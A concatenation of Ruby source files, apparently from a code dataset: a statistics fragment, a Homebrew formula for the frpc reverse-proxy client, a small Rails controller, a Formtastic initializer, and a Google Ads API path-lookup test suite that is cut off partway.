def pdf(x,mu=0,sigma=1)
return (1/Math.sqrt(2*Math::PI)*sigma.abs)*Math.exp(-(((x-mu)/sigma.abs)**2/2))
end
def ppf(x,mu=0,sigma=1)
return mu-sigma*Math.sqrt(2)*ierfcc(2*x)
end
end
| 21.264706 | 83 | 0.53112 |
61ef8235ea3fece719d06b9fefa8b78a1718d1e8 | 2,223 | class Frpc < Formula
desc "Client app of fast reverse proxy to expose a local server to the internet"
homepage "https://github.com/fatedier/frp"
url "https://github.com/fatedier/frp.git",
tag: "v0.43.0",
revision: "fe5fb0326b2aa7741d5b5d8f8c4c3ca12bb4ed91"
license "Apache-2.0"
bottle do
sha256 cellar: :any_skip_relocation, arm64_monterey: "a85a02fbea44970f091539f3bdf90280f35993f866b943af012a43354769be64"
sha256 cellar: :any_skip_relocation, arm64_big_sur: "a85a02fbea44970f091539f3bdf90280f35993f866b943af012a43354769be64"
sha256 cellar: :any_skip_relocation, monterey: "650e98414d94f8419f96af47497bdd9413e3e6c4816042e916678f167ec6b5a5"
sha256 cellar: :any_skip_relocation, big_sur: "650e98414d94f8419f96af47497bdd9413e3e6c4816042e916678f167ec6b5a5"
sha256 cellar: :any_skip_relocation, catalina: "650e98414d94f8419f96af47497bdd9413e3e6c4816042e916678f167ec6b5a5"
sha256 cellar: :any_skip_relocation, x86_64_linux: "38f7df2d38baa038e833fa6a3cf9b8b1dfc9019a6789bda6efba9e8da09c1dcb"
end
depends_on "go" => :build
def install
(buildpath/"bin").mkpath
(etc/"frp").mkpath
system "make", "frpc"
bin.install "bin/frpc"
etc.install "conf/frpc.ini" => "frp/frpc.ini"
etc.install "conf/frpc_full.ini" => "frp/frpc_full.ini"
end
service do
run [opt_bin/"frpc", "-c", etc/"frp/frpc.ini"]
keep_alive true
error_log_path var/"log/frpc.log"
log_path var/"log/frpc.log"
end
test do
assert_match version.to_s, shell_output("#{bin}/frpc -v")
assert_match "Commands", shell_output("#{bin}/frpc help")
assert_match "local_port", shell_output("#{bin}/frpc http", 1)
assert_match "local_port", shell_output("#{bin}/frpc https", 1)
assert_match "local_port", shell_output("#{bin}/frpc stcp", 1)
assert_match "local_port", shell_output("#{bin}/frpc tcp", 1)
assert_match "local_port", shell_output("#{bin}/frpc udp", 1)
assert_match "local_port", shell_output("#{bin}/frpc xtcp", 1)
assert_match "admin_port", shell_output("#{bin}/frpc status -c #{etc}/frp/frpc.ini", 1)
assert_match "admin_port", shell_output("#{bin}/frpc reload -c #{etc}/frp/frpc.ini", 1)
end
end
| 44.46 | 123 | 0.728745 |
5d5024d4ceeaaf51e9609f10e5599f9311c8b0c6 | 249 | class AdministrationsController < ApplicationController
def show
@administartion = Administration.find_by(id: params[:id])
@city = @administartion.city
if current_user.admin?
@suggestions = PendingSuggestion.all
end
end
end | 27.666667 | 61 | 0.738956 |
383cb970c3668037febc9dba1a68d7221d87794d | 725 | module ActionPanel
module Initializers
# Formtastic Initializers
module Formtastic
BASE_FILES = %w[wrapping html choices].freeze
INPUTS_FILES = %w[
select_input select2_input check_boxes_input radio_input
boolean_input switch_input file_input color_picker_input
date_picker_input just_datetime_picker_input hstore_input
rich_text_area_input password_input
].freeze
include Base
extend ActiveSupport::Concern
included do
initializer 'formtastic.overrides' do |_app|
require_each(BASE_FILES, path: 'formtastic/base')
require_each(INPUTS_FILES, path: 'formtastic/inputs')
end
end
end
end
end
| 23.387097 | 65 | 0.696552 |
4a6aeda361b6490aa464117dfccdad17e70cf3f8 | 48,355 | #!/usr/bin/env ruby
# Encoding: utf-8
#
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Tests the PathLookupUtil class.
require 'minitest/autorun'
require 'google/ads/google_ads'
require 'google/ads/google_ads/utils/v3/path_lookup_util'
require 'google/ads/google_ads/utils/v4/path_lookup_util'
require 'google/ads/google_ads/utils/v5/path_lookup_util'
require 'google/ads/google_ads/utils/v6/path_lookup_util'
class TestPathLookupUtil < Minitest::Test
def test_path_generation_v3()
util = Google::Ads::GoogleAds::Utils::V3::PathLookupUtil.new
expected = 'customers/1234/accountBudgetProposals/5678'
assert_equal(expected, util.account_budget_proposal(1234, 5678))
expected = 'customers/1234/accountBudgets/5678'
assert_equal(expected, util.account_budget(1234, 5678))
expected = 'customers/1234/adGroupAdLabels/56~78~90'
assert_equal(expected, util.ad_group_ad_label(1234, 56, 78, 90))
expected = 'customers/1234/adGroupAds/567~890'
assert_equal(expected, util.ad_group_ad(1234, 567, 890))
expected = 'customers/1234/adGroupAudienceViews/567~890'
assert_equal(expected, util.ad_group_audience_view(1234, 567, 890))
expected = 'customers/1234/adGroupBidModifiers/567~890'
assert_equal(expected, util.ad_group_bid_modifier(1234, 567, 890))
expected = 'customers/1234/adGroupCriterionLabels/56~78~90'
assert_equal(expected, util.ad_group_criterion_label(1234, 56, 78, 90))
expected = 'customers/1234/adGroupCriteria/567~890'
assert_equal(expected, util.ad_group_criterion(1234, 567, 890))
expected = 'customers/1234/adGroupCriterionSimulations/5~6~7~8~9~0'
assert_equal(expected, util.ad_group_criterion_simulation(1234, 5, 6, 7, 8, 9, 0))
expected = 'customers/1234/adGroupExtensionSettings/567~890'
assert_equal(expected, util.ad_group_extension_setting(1234, 567, 890))
expected = 'customers/1234/adGroupFeeds/567~890'
assert_equal(expected, util.ad_group_feed(1234, 567, 890))
expected = 'customers/1234/adGroupLabels/567~890'
assert_equal(expected, util.ad_group_label(1234, 567, 890))
expected = 'customers/1234/adGroups/5678'
assert_equal(expected, util.ad_group(1234, 5678))
expected = 'customers/1234/adGroupSimulations/5~6~7~8~9'
assert_equal(expected, util.ad_group_simulation(1234, 5, 6, 7, 8, 9))
expected = 'customers/1234/adParameters/56~78~90'
assert_equal(expected, util.ad_parameter(1234, 56, 78, 90))
expected = 'customers/1234/adScheduleViews/567~890'
assert_equal(expected, util.ad_schedule_view(1234, 567, 890))
expected = 'customers/1234/ageRangeViews/567~890'
assert_equal(expected, util.age_range_view(1234, 567, 890))
expected = 'customers/1234/assets/5678'
assert_equal(expected, util.asset(1234, 5678))
expected = 'customers/1234/biddingStrategies/5678'
assert_equal(expected, util.bidding_strategy(1234, 5678))
expected = 'customers/1234/billingSetups/5678'
assert_equal(expected, util.billing_setup(1234, 5678))
expected = 'customers/1234/campaignAudienceViews/567~890'
assert_equal(expected, util.campaign_audience_view(1234, 567, 890))
expected = 'customers/1234/campaignDrafts/567~890'
assert_equal(expected, util.campaign_draft(1234, 567, 890))
expected = 'customers/1234/campaignBidModifiers/567~890'
assert_equal(expected, util.campaign_bid_modifier(1234, 567, 890))
expected = 'customers/1234/campaignExperiments/5678'
assert_equal(expected, util.campaign_experiment(1234, 5678))
expected = 'customers/1234/campaignBudgets/5678'
assert_equal(expected, util.campaign_budget(1234, 5678))
expected = 'customers/1234/campaignCriteria/567~890'
assert_equal(expected, util.campaign_criterion(1234, 567, 890))
expected = 'customers/1234/campaignCriterionSimulations/5~6~7~8~9~0'
assert_equal(expected, util.campaign_criterion_simulation(1234, 5, 6, 7, 8, 9, 0))
expected = 'customers/1234/campaignExtensionSettings/567~890'
assert_equal(expected, util.campaign_extension_setting(1234, 567, 890))
expected = 'customers/1234/campaignFeeds/567~890'
assert_equal(expected, util.campaign_feed(1234, 567, 890))
expected = 'customers/1234/campaignLabels/567~890'
assert_equal(expected, util.campaign_label(1234, 567, 890))
expected = 'customers/1234/campaignSharedSets/567~890'
assert_equal(expected, util.campaign_shared_set(1234, 567, 890))
expected = 'customers/1234/campaigns/5678'
assert_equal(expected, util.campaign(1234, 5678))
expected = 'carrierConstants/123456'
assert_equal(expected, util.carrier_constant(123456))
expected = 'customers/1234/changeStatus/5678'
assert_equal(expected, util.change_status(1234, 5678))
expected = 'customers/1234/clickViews/567~890'
assert_equal(expected, util.click_view(1234, 567, 890))
expected = 'customers/1234/conversionActions/5678'
assert_equal(expected, util.conversion_action(1234, 5678))
expected = 'currencyConstants/123456'
assert_equal(expected, util.currency_constant(123456))
expected = 'customers/1234/customInterests/5678'
assert_equal(expected, util.custom_interest(1234, 5678))
expected = 'customers/1234/customerClientLinks/567~890'
assert_equal(expected, util.customer_client_link(1234, 567, 890))
expected = 'customers/1234/customerClients/5678'
assert_equal(expected, util.customer_client(1234, 5678))
expected = 'customers/1234/customerExtensionSettings/5678'
assert_equal(expected, util.customer_extension_setting(1234, 5678))
expected = 'customers/1234/customerFeeds/5678'
assert_equal(expected, util.customer_feed(1234, 5678))
expected = 'customers/1234/customerLabels/5678'
assert_equal(expected, util.customer_label(1234, 5678))
expected = 'customers/1234/customerManagerLinks/567~890'
assert_equal(expected, util.customer_manager_link(1234, 567, 890))
expected = 'customers/1234/customerNegativeCriteria/5678'
assert_equal(expected, util.customer_negative_criterion(1234, 5678))
expected = 'customers/123456'
assert_equal(expected, util.customer(123456))
expected = 'customers/1234/detailPlacementViews/567~890'
assert_equal(expected, util.detail_placement_view(1234, 567, 890))
expected = 'customers/1234/displayKeywordViews/567~890'
assert_equal(expected, util.display_keyword_view(1234, 567, 890))
expected = 'customers/1234/domainCategories/56~78~90'
assert_equal(expected, util.domain_category(1234, 56, 78, 90))
expected = 'customers/1234/dynamicSearchAdsSearchTermViews/5~6~7~8~9'
assert_equal(expected, util.dynamic_search_ads_search_term_view(1234, 5, 6,
7, 8, 9))
expected = 'customers/1234/expandedLandingPageViews/5678'
assert_equal(expected, util.expanded_landing_page_view(1234, 5678))
expected = 'customers/1234/extensionFeedItems/5678'
assert_equal(expected, util.extension_feed_item(1234, 5678))
expected = 'customers/1234/feedItems/567~890'
assert_equal(expected, util.feed_item(1234, 567, 890))
expected = 'customers/1234/feedItemTargets/5~6~7~8'
assert_equal(expected, util.feed_item_target(1234, 5, 6, 7, 8))
expected = 'customers/1234/feedMappings/567~890'
assert_equal(expected, util.feed_mapping(1234, 567, 890))
expected = 'customers/1234/feedPlaceholderViews/5678'
assert_equal(expected, util.feed_placeholder_view(1234, 5678))
expected = 'customers/1234/feeds/5678'
assert_equal(expected, util.feed(1234, 5678))
expected = 'geoTargetConstants/123456'
assert_equal(expected, util.geo_target_constant(123456))
expected = 'customers/1234/geographicViews/567~890'
assert_equal(expected, util.geographic_view(1234, 567, 890))
expected = 'googleAdsFields/test_field'
assert_equal(expected, util.google_ads_field('test_field'))
expected = 'customers/1234/groupPlacementViews/567~890'
assert_equal(expected, util.group_placement_view(1234, 567, 890))
expected = 'customers/1234/hotelGroupViews/567~890'
assert_equal(expected, util.hotel_group_view(1234, 567, 890))
expected = 'customers/123456/hotelPerformanceView'
assert_equal(expected, util.hotel_performance_view(123456))
expected = 'customers/1234/keywordPlanAdGroups/5678'
assert_equal(expected, util.keyword_plan_ad_group(1234, 5678))
expected = 'customers/1234/keywordPlanCampaigns/5678'
assert_equal(expected, util.keyword_plan_campaign(1234, 5678))
expected = 'customers/1234/keywordPlanKeywords/5678'
assert_equal(expected, util.keyword_plan_keyword(1234, 5678))
expected = 'customers/1234/keywordPlanNegativeKeywords/5678'
assert_equal(expected, util.keyword_plan_negative_keyword(1234, 5678))
expected = 'customers/1234/keywordPlans/5678'
assert_equal(expected, util.keyword_plan(1234, 5678))
expected = 'customers/1234/keywordViews/567~890'
assert_equal(expected, util.keyword_view(1234, 567, 890))
expected = 'customers/1234/labels/5678'
assert_equal(expected, util.label(1234, 5678))
expected = 'languageConstants/123456'
assert_equal(expected, util.language_constant(123456))
expected = 'customers/1234/locationViews/567~890'
assert_equal(expected, util.location_view(1234, 567, 890))
expected = 'customers/1234/managedPlacementViews/567~890'
assert_equal(expected, util.managed_placement_view(1234, 567, 890))
expected = 'customers/1234/mediaFiles/5678'
assert_equal(expected, util.media_file(1234, 5678))
expected = 'customers/1234/merchantCenterLinks/5678'
assert_equal(expected, util.merchant_center_link(1234, 5678))
expected = 'mobileAppCategoryConstants/123456'
assert_equal(expected, util.mobile_app_category_constant(123456))
expected = 'mobileDeviceConstants/123456'
assert_equal(expected, util.mobile_device_constant(123456))
expected = 'customers/1234/mutateJobs/5678'
assert_equal(expected, util.mutate_job(1234, 5678))
expected = 'operatingSystemVersionConstants/123456'
assert_equal(expected, util.operating_system_version_constant(123456))
expected = 'customers/1234/parentalStatusViews/567~890'
assert_equal(expected, util.parental_status_view(1234, 567, 890))
expected = 'productBiddingCategoryConstants/123~456~789'
assert_equal(expected, util.product_bidding_category_constant(123, 456,
789))
expected = 'customers/1234/productGroupViews/567~890'
assert_equal(expected, util.product_group_view(1234, 567, 890))
expected = 'customers/1234/recommendations/5678'
assert_equal(expected, util.recommendation(1234, 5678))
expected = 'customers/1234/remarketingActions/5678'
assert_equal(expected, util.remarketing_action(1234, 5678))
expected = 'customers/1234/searchTermViews/56~78~90'
assert_equal(expected, util.search_term_view(1234, 56, 78, 90))
expected = 'customers/1234/sharedCriteria/567~890'
assert_equal(expected, util.shared_criterion(1234, 567, 890))
expected = 'customers/1234/sharedSets/5678'
assert_equal(expected, util.shared_set(1234, 5678))
expected = 'customers/1234/shoppingPerformanceView'
assert_equal(expected, util.shopping_performance_view(1234))
expected = 'topicConstants/123456'
assert_equal(expected, util.topic_constant(123456))
expected = 'customers/1234/topicViews/567~890'
assert_equal(expected, util.topic_view(1234, 567, 890))
expected = 'customers/1234/userInterests/5678'
assert_equal(expected, util.user_interest(1234, 5678))
expected = 'customers/1234/userLists/5678'
assert_equal(expected, util.user_list(1234, 5678))
expected = 'customers/1234/videos/5678'
assert_equal(expected, util.video(1234, 5678))
end
def test_path_generation_v4()
util = Google::Ads::GoogleAds::Utils::V4::PathLookupUtil.new
expected = 'customers/1234/accountBudgetProposals/5678'
assert_equal(expected, util.account_budget_proposal(1234, 5678))
expected = 'customers/1234/accountBudgets/5678'
assert_equal(expected, util.account_budget(1234, 5678))
expected = 'customers/1234/accountLinks/5678'
assert_equal(expected, util.account_link(1234, 5678))
expected = 'customers/1234/adGroupAdLabels/56~78~90'
assert_equal(expected, util.ad_group_ad_label(1234, 56, 78, 90))
expected = 'customers/1234/adGroupAds/567~890'
assert_equal(expected, util.ad_group_ad(1234, 567, 890))
expected = 'customers/1234/adGroupAudienceViews/567~890'
assert_equal(expected, util.ad_group_audience_view(1234, 567, 890))
expected = 'customers/1234/adGroupBidModifiers/567~890'
assert_equal(expected, util.ad_group_bid_modifier(1234, 567, 890))
expected = 'customers/1234/adGroupCriterionLabels/56~78~90'
assert_equal(expected, util.ad_group_criterion_label(1234, 56, 78, 90))
expected = 'customers/1234/adGroupCriteria/567~890'
assert_equal(expected, util.ad_group_criterion(1234, 567, 890))
expected = 'customers/1234/adGroupCriterionSimulations/5~6~7~8~9~0'
assert_equal(expected, util.ad_group_criterion_simulation(1234, 5, 6, 7, 8, 9, 0))
expected = 'customers/1234/adGroupExtensionSettings/567~890'
assert_equal(expected, util.ad_group_extension_setting(1234, 567, 890))
expected = 'customers/1234/adGroupFeeds/567~890'
assert_equal(expected, util.ad_group_feed(1234, 567, 890))
expected = 'customers/1234/adGroupLabels/567~890'
assert_equal(expected, util.ad_group_label(1234, 567, 890))
expected = 'customers/1234/adGroups/5678'
assert_equal(expected, util.ad_group(1234, 5678))
expected = 'customers/1234/adGroupSimulations/5~6~7~8~9'
assert_equal(expected, util.ad_group_simulation(1234, 5, 6, 7, 8, 9))
expected = 'customers/1234/adParameters/56~78~90'
assert_equal(expected, util.ad_parameter(1234, 56, 78, 90))
expected = 'customers/1234/adScheduleViews/567~890'
assert_equal(expected, util.ad_schedule_view(1234, 567, 890))
expected = 'customers/1234/ageRangeViews/567~890'
assert_equal(expected, util.age_range_view(1234, 567, 890))
expected = 'customers/1234/assets/5678'
assert_equal(expected, util.asset(1234, 5678))
expected = 'customers/1234/batchJobs/5678'
assert_equal(expected, util.batch_job(1234, 5678))
expected = 'customers/1234/biddingStrategies/5678'
assert_equal(expected, util.bidding_strategy(1234, 5678))
expected = 'customers/1234/billingSetups/5678'
assert_equal(expected, util.billing_setup(1234, 5678))
expected = 'customers/1234/campaignAudienceViews/567~890'
assert_equal(expected, util.campaign_audience_view(1234, 567, 890))
expected = 'customers/1234/campaignDrafts/567~890'
assert_equal(expected, util.campaign_draft(1234, 567, 890))
expected = 'customers/1234/campaignBidModifiers/567~890'
assert_equal(expected, util.campaign_bid_modifier(1234, 567, 890))
expected = 'customers/1234/campaignExperiments/5678'
assert_equal(expected, util.campaign_experiment(1234, 5678))
expected = 'customers/1234/campaignBudgets/5678'
assert_equal(expected, util.campaign_budget(1234, 5678))
expected = 'customers/1234/campaignCriteria/567~890'
assert_equal(expected, util.campaign_criterion(1234, 567, 890))
expected = 'customers/1234/campaignCriterionSimulations/5~6~7~8~9~0'
assert_equal(expected, util.campaign_criterion_simulation(1234, 5, 6, 7, 8, 9, 0))
expected = 'customers/1234/campaignExtensionSettings/567~890'
assert_equal(expected, util.campaign_extension_setting(1234, 567, 890))
expected = 'customers/1234/campaignFeeds/567~890'
assert_equal(expected, util.campaign_feed(1234, 567, 890))
expected = 'customers/1234/campaignLabels/567~890'
assert_equal(expected, util.campaign_label(1234, 567, 890))
expected = 'customers/1234/campaignSharedSets/567~890'
assert_equal(expected, util.campaign_shared_set(1234, 567, 890))
expected = 'customers/1234/campaigns/5678'
assert_equal(expected, util.campaign(1234, 5678))
expected = 'carrierConstants/123456'
assert_equal(expected, util.carrier_constant(123456))
expected = 'customers/1234/changeStatus/5678'
assert_equal(expected, util.change_status(1234, 5678))
expected = 'customers/1234/clickViews/567~890'
assert_equal(expected, util.click_view(1234, 567, 890))
expected = 'customers/1234/conversionActions/5678'
assert_equal(expected, util.conversion_action(1234, 5678))
expected = 'currencyConstants/123456'
assert_equal(expected, util.currency_constant(123456))
expected = 'customers/1234/customInterests/5678'
assert_equal(expected, util.custom_interest(1234, 5678))
expected = 'customers/1234/customerClientLinks/567~890'
assert_equal(expected, util.customer_client_link(1234, 567, 890))
expected = 'customers/1234/customerClients/5678'
assert_equal(expected, util.customer_client(1234, 5678))
expected = 'customers/1234/customerExtensionSettings/5678'
assert_equal(expected, util.customer_extension_setting(1234, 5678))
expected = 'customers/1234/customerFeeds/5678'
assert_equal(expected, util.customer_feed(1234, 5678))
expected = 'customers/1234/customerLabels/5678'
assert_equal(expected, util.customer_label(1234, 5678))
expected = 'customers/1234/customerManagerLinks/567~890'
assert_equal(expected, util.customer_manager_link(1234, 567, 890))
expected = 'customers/1234/customerNegativeCriteria/5678'
assert_equal(expected, util.customer_negative_criterion(1234, 5678))
expected = 'customers/123456'
assert_equal(expected, util.customer(123456))
expected = 'customers/1234/detailPlacementViews/567~890'
assert_equal(expected, util.detail_placement_view(1234, 567, 890))
expected = 'customers/1234/displayKeywordViews/567~890'
assert_equal(expected, util.display_keyword_view(1234, 567, 890))
expected = 'customers/1234/domainCategories/56~78~90'
assert_equal(expected, util.domain_category(1234, 56, 78, 90))
expected = 'customers/1234/dynamicSearchAdsSearchTermViews/5~6~7~8~9'
assert_equal(expected, util.dynamic_search_ads_search_term_view(1234, 5, 6,
7, 8, 9))
expected = 'customers/1234/expandedLandingPageViews/5678'
assert_equal(expected, util.expanded_landing_page_view(1234, 5678))
expected = 'customers/1234/extensionFeedItems/5678'
assert_equal(expected, util.extension_feed_item(1234, 5678))
expected = 'customers/1234/feedItems/567~890'
assert_equal(expected, util.feed_item(1234, 567, 890))
expected = 'customers/1234/feedItemTargets/5~6~7~8'
assert_equal(expected, util.feed_item_target(1234, 5, 6, 7, 8))
expected = 'customers/1234/feedMappings/567~890'
assert_equal(expected, util.feed_mapping(1234, 567, 890))
expected = 'customers/1234/feedPlaceholderViews/5678'
assert_equal(expected, util.feed_placeholder_view(1234, 5678))
expected = 'customers/1234/feeds/5678'
assert_equal(expected, util.feed(1234, 5678))
expected = 'geoTargetConstants/123456'
assert_equal(expected, util.geo_target_constant(123456))
expected = 'customers/1234/geographicViews/567~890'
assert_equal(expected, util.geographic_view(1234, 567, 890))
expected = 'googleAdsFields/test_field'
assert_equal(expected, util.google_ads_field('test_field'))
expected = 'customers/1234/groupPlacementViews/567~890'
assert_equal(expected, util.group_placement_view(1234, 567, 890))
expected = 'customers/1234/hotelGroupViews/567~890'
assert_equal(expected, util.hotel_group_view(1234, 567, 890))
expected = 'customers/123456/hotelPerformanceView'
assert_equal(expected, util.hotel_performance_view(123456))
expected = 'customers/1234/incomeRangeViews/567~890'
assert_equal(expected, util.income_range_view(1234, 567, 890))
expected = 'customers/1234/keywordPlanAdGroups/5678'
assert_equal(expected, util.keyword_plan_ad_group(1234, 5678))
expected = 'customers/1234/keywordPlanAdGroupKeywords/5678'
assert_equal(expected, util.keyword_plan_ad_group_keyword(1234, 5678))
expected = 'customers/1234/keywordPlanCampaigns/5678'
assert_equal(expected, util.keyword_plan_campaign(1234, 5678))
expected = 'customers/1234/keywordPlanCampaignKeywords/5678'
assert_equal(expected, util.keyword_plan_campaign_keyword(1234, 5678))
expected = 'customers/1234/keywordPlans/5678'
assert_equal(expected, util.keyword_plan(1234, 5678))
expected = 'customers/1234/keywordViews/567~890'
assert_equal(expected, util.keyword_view(1234, 567, 890))
expected = 'customers/1234/labels/5678'
assert_equal(expected, util.label(1234, 5678))
expected = 'languageConstants/123456'
assert_equal(expected, util.language_constant(123456))
expected = 'customers/1234/locationViews/567~890'
assert_equal(expected, util.location_view(1234, 567, 890))
expected = 'customers/1234/managedPlacementViews/567~890'
assert_equal(expected, util.managed_placement_view(1234, 567, 890))
expected = 'customers/1234/mediaFiles/5678'
assert_equal(expected, util.media_file(1234, 5678))
expected = 'customers/1234/merchantCenterLinks/5678'
assert_equal(expected, util.merchant_center_link(1234, 5678))
expected = 'mobileAppCategoryConstants/123456'
assert_equal(expected, util.mobile_app_category_constant(123456))
expected = 'mobileDeviceConstants/123456'
assert_equal(expected, util.mobile_device_constant(123456))
expected = 'operatingSystemVersionConstants/123456'
assert_equal(expected, util.operating_system_version_constant(123456))
expected = 'customers/1234/parentalStatusViews/567~890'
assert_equal(expected, util.parental_status_view(1234, 567, 890))
expected = 'productBiddingCategoryConstants/123~456~789'
assert_equal(expected, util.product_bidding_category_constant(123, 456,
789))
expected = 'customers/1234/productGroupViews/567~890'
assert_equal(expected, util.product_group_view(1234, 567, 890))
expected = 'customers/1234/recommendations/5678'
assert_equal(expected, util.recommendation(1234, 5678))
expected = 'customers/1234/remarketingActions/5678'
assert_equal(expected, util.remarketing_action(1234, 5678))
expected = 'customers/1234/searchTermViews/56~78~90'
assert_equal(expected, util.search_term_view(1234, 56, 78, 90))
expected = 'customers/1234/sharedCriteria/567~890'
assert_equal(expected, util.shared_criterion(1234, 567, 890))
expected = 'customers/1234/sharedSets/5678'
assert_equal(expected, util.shared_set(1234, 5678))
expected = 'customers/1234/shoppingPerformanceView'
assert_equal(expected, util.shopping_performance_view(1234))
expected = 'customers/1234/thirdPartyAppAnalyticsLinks/5678'
assert_equal(expected, util.third_party_app_analytics_link(1234, 5678))
expected = 'topicConstants/123456'
assert_equal(expected, util.topic_constant(123456))
expected = 'customers/1234/topicViews/567~890'
assert_equal(expected, util.topic_view(1234, 567, 890))
expected = 'customers/1234/userInterests/5678'
assert_equal(expected, util.user_interest(1234, 5678))
expected = 'customers/1234/userLists/5678'
assert_equal(expected, util.user_list(1234, 5678))
expected = 'customers/1234/videos/5678'
assert_equal(expected, util.video(1234, 5678))
end
def test_path_generation_v5()
util = Google::Ads::GoogleAds::Utils::V5::PathLookupUtil.new
expected = 'customers/1234/accountBudgetProposals/5678'
assert_equal(expected, util.account_budget_proposal(1234, 5678))
expected = 'customers/1234/accountBudgets/5678'
assert_equal(expected, util.account_budget(1234, 5678))
expected = 'customers/1234/accountLinks/5678'
assert_equal(expected, util.account_link(1234, 5678))
expected = 'customers/1234/adGroupAdLabels/56~78~90'
assert_equal(expected, util.ad_group_ad_label(1234, 56, 78, 90))
expected = 'customers/1234/adGroupAds/567~890'
assert_equal(expected, util.ad_group_ad(1234, 567, 890))
expected = 'customers/1234/adGroupAudienceViews/567~890'
assert_equal(expected, util.ad_group_audience_view(1234, 567, 890))
expected = 'customers/1234/adGroupBidModifiers/567~890'
assert_equal(expected, util.ad_group_bid_modifier(1234, 567, 890))
expected = 'customers/1234/adGroupCriterionLabels/56~78~90'
assert_equal(expected, util.ad_group_criterion_label(1234, 56, 78, 90))
expected = 'customers/1234/adGroupCriteria/567~890'
assert_equal(expected, util.ad_group_criterion(1234, 567, 890))
expected = 'customers/1234/adGroupCriterionSimulations/5~6~7~8~9~0'
assert_equal(expected, util.ad_group_criterion_simulation(1234, 5, 6, 7, 8, 9, 0))
expected = 'customers/1234/adGroupExtensionSettings/567~890'
assert_equal(expected, util.ad_group_extension_setting(1234, 567, 890))
expected = 'customers/1234/adGroupFeeds/567~890'
assert_equal(expected, util.ad_group_feed(1234, 567, 890))
expected = 'customers/1234/adGroupLabels/567~890'
assert_equal(expected, util.ad_group_label(1234, 567, 890))
expected = 'customers/1234/adGroups/5678'
assert_equal(expected, util.ad_group(1234, 5678))
expected = 'customers/1234/adGroupSimulations/5~6~7~8~9'
assert_equal(expected, util.ad_group_simulation(1234, 5, 6, 7, 8, 9))
expected = 'customers/1234/adParameters/56~78~90'
assert_equal(expected, util.ad_parameter(1234, 56, 78, 90))
expected = 'customers/1234/adScheduleViews/567~890'
assert_equal(expected, util.ad_schedule_view(1234, 567, 890))
expected = 'customers/1234/ageRangeViews/567~890'
assert_equal(expected, util.age_range_view(1234, 567, 890))
expected = 'customers/1234/assets/5678'
assert_equal(expected, util.asset(1234, 5678))
expected = 'customers/1234/batchJobs/5678'
assert_equal(expected, util.batch_job(1234, 5678))
expected = 'customers/1234/biddingStrategies/5678'
assert_equal(expected, util.bidding_strategy(1234, 5678))
expected = 'customers/1234/billingSetups/5678'
assert_equal(expected, util.billing_setup(1234, 5678))
expected = 'customers/1234/campaignAudienceViews/567~890'
assert_equal(expected, util.campaign_audience_view(1234, 567, 890))
expected = 'customers/1234/campaignDrafts/567~890'
assert_equal(expected, util.campaign_draft(1234, 567, 890))
expected = 'customers/1234/campaignBidModifiers/567~890'
assert_equal(expected, util.campaign_bid_modifier(1234, 567, 890))
expected = 'customers/1234/campaignExperiments/5678'
assert_equal(expected, util.campaign_experiment(1234, 5678))
expected = 'customers/1234/campaignBudgets/5678'
assert_equal(expected, util.campaign_budget(1234, 5678))
expected = 'customers/1234/campaignCriteria/567~890'
assert_equal(expected, util.campaign_criterion(1234, 567, 890))
expected = 'customers/1234/campaignCriterionSimulations/5~6~7~8~9~0'
assert_equal(expected, util.campaign_criterion_simulation(1234, 5, 6, 7, 8, 9, 0))
expected = 'customers/1234/campaignExtensionSettings/567~890'
assert_equal(expected, util.campaign_extension_setting(1234, 567, 890))
expected = 'customers/1234/campaignFeeds/567~890'
assert_equal(expected, util.campaign_feed(1234, 567, 890))
expected = 'customers/1234/campaignLabels/567~890'
assert_equal(expected, util.campaign_label(1234, 567, 890))
expected = 'customers/1234/campaignSharedSets/567~890'
assert_equal(expected, util.campaign_shared_set(1234, 567, 890))
expected = 'customers/1234/campaigns/5678'
assert_equal(expected, util.campaign(1234, 5678))
expected = 'carrierConstants/123456'
assert_equal(expected, util.carrier_constant(123456))
expected = 'customers/1234/changeStatus/5678'
assert_equal(expected, util.change_status(1234, 5678))
expected = 'customers/1234/clickViews/567~890'
assert_equal(expected, util.click_view(1234, 567, 890))
expected = 'customers/1234/conversionActions/5678'
assert_equal(expected, util.conversion_action(1234, 5678))
expected = 'currencyConstants/123456'
assert_equal(expected, util.currency_constant(123456))
expected = 'customers/1234/customInterests/5678'
assert_equal(expected, util.custom_interest(1234, 5678))
expected = 'customers/1234/customerClientLinks/567~890'
assert_equal(expected, util.customer_client_link(1234, 567, 890))
expected = 'customers/1234/customerClients/5678'
assert_equal(expected, util.customer_client(1234, 5678))
expected = 'customers/1234/customerExtensionSettings/5678'
assert_equal(expected, util.customer_extension_setting(1234, 5678))
expected = 'customers/1234/customerFeeds/5678'
assert_equal(expected, util.customer_feed(1234, 5678))
expected = 'customers/1234/customerLabels/5678'
assert_equal(expected, util.customer_label(1234, 5678))
expected = 'customers/1234/customerManagerLinks/567~890'
assert_equal(expected, util.customer_manager_link(1234, 567, 890))
expected = 'customers/1234/customerNegativeCriteria/5678'
assert_equal(expected, util.customer_negative_criterion(1234, 5678))
expected = 'customers/123456'
assert_equal(expected, util.customer(123456))
expected = 'customers/1234/detailPlacementViews/567~890'
assert_equal(expected, util.detail_placement_view(1234, 567, 890))
expected = 'customers/1234/displayKeywordViews/567~890'
assert_equal(expected, util.display_keyword_view(1234, 567, 890))
expected = 'customers/1234/domainCategories/56~78~90'
assert_equal(expected, util.domain_category(1234, 56, 78, 90))
expected = 'customers/1234/dynamicSearchAdsSearchTermViews/5~6~7~8~9'
assert_equal(expected, util.dynamic_search_ads_search_term_view(1234, 5, 6,
7, 8, 9))
expected = 'customers/1234/expandedLandingPageViews/5678'
assert_equal(expected, util.expanded_landing_page_view(1234, 5678))
expected = 'customers/1234/extensionFeedItems/5678'
assert_equal(expected, util.extension_feed_item(1234, 5678))
expected = 'customers/1234/feedItems/567~890'
assert_equal(expected, util.feed_item(1234, 567, 890))
expected = 'customers/1234/feedItemTargets/5~6~7~8'
assert_equal(expected, util.feed_item_target(1234, 5, 6, 7, 8))
expected = 'customers/1234/feedMappings/567~890'
assert_equal(expected, util.feed_mapping(1234, 567, 890))
expected = 'customers/1234/feedPlaceholderViews/5678'
